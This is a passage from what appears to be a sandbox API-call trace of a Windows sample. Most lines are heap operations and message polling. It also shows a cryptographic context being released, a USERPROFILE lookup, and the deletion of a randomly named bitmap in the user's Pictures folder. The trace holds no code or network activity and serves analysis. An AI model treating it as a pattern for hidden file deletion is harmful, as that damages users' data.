0x2aaa5b8 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa918 [0208.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa990 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa858 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa20 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa840 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.684] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0208.684] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0208.685] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0208.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0208.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0208.685] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.686] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.686] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.686] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.686] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.686] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.686] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.686] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.686] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.686] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.686] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.686] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.686] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.686] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.686] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.686] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.686] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.686] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.687] CryptReleaseContext (hProv=0xa7bef0, dwFlags=0x0) returned 1 [0208.687] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.687] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.687] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.687] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.687] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.687] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0208.687] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.687] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.687] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.687] CloseHandle (hObject=0x510) returned 1 [0208.688] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.688] CloseHandle (hObject=0x524) returned 1 [0208.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.692] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.692] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.692] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.693] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/5aASoDBkD4Ug.bmp", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\5aASoDBkD4Ug.bmp", lpFilePart=0x8cedf4*="5aASoDBkD4Ug.bmp") returned 0x29 [0208.693] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5aASoDBkD4Ug.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5aasodbkd4ug.bmp")) returned 0x20 [0208.693] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\5aASoDBkD4Ug.bmp", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d1f7750, ftCreationTime.dwHighDateTime=0x1d5d4b5, ftLastAccessTime.dwLowDateTime=0xb3112770, ftLastAccessTime.dwHighDateTime=0x1d5cec6, ftLastWriteTime.dwLowDateTime=0xb3112770, ftLastWriteTime.dwHighDateTime=0x1d5cec6, nFileSizeHigh=0x0, nFileSizeLow=0x17ec3, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="5aASoDBkD4Ug.bmp", cAlternateFileName="5AASOD~1.BMP")) returned 0x9e1db8 [0208.693] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5aASoDBkD4Ug.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5aasodbkd4ug.bmp")) returned 1 [0208.702] FindNextFileW (in: hFindFile=0x9e1db8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d1f7750, ftCreationTime.dwHighDateTime=0x1d5d4b5, ftLastAccessTime.dwLowDateTime=0xb3112770, ftLastAccessTime.dwHighDateTime=0x1d5cec6, ftLastWriteTime.dwLowDateTime=0xb3112770, ftLastWriteTime.dwHighDateTime=0x1d5cec6, nFileSizeHigh=0x0, nFileSizeLow=0x17ec3, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="5aASoDBkD4Ug.bmp", cAlternateFileName="5AASOD~1.BMP")) returned 0 [0208.702] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0208.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0208.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0208.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.703] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.703] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0208.704] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.704] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.704] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.704] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.705] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.705] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5fba0 [0208.706] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/5aASoDBkD4Ug.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\5aASoDBkD4Ug.bmp", lpFilePart=0x8cf650*="5aASoDBkD4Ug.bmp") returned 0x29 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fba0 | out: hHeap=0x2af0000) returned 1 [0208.706] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5aASoDBkD4Ug.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5aasodbkd4ug.bmp")) returned 0xffffffff [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.706] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0208.706] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.706] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0208.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 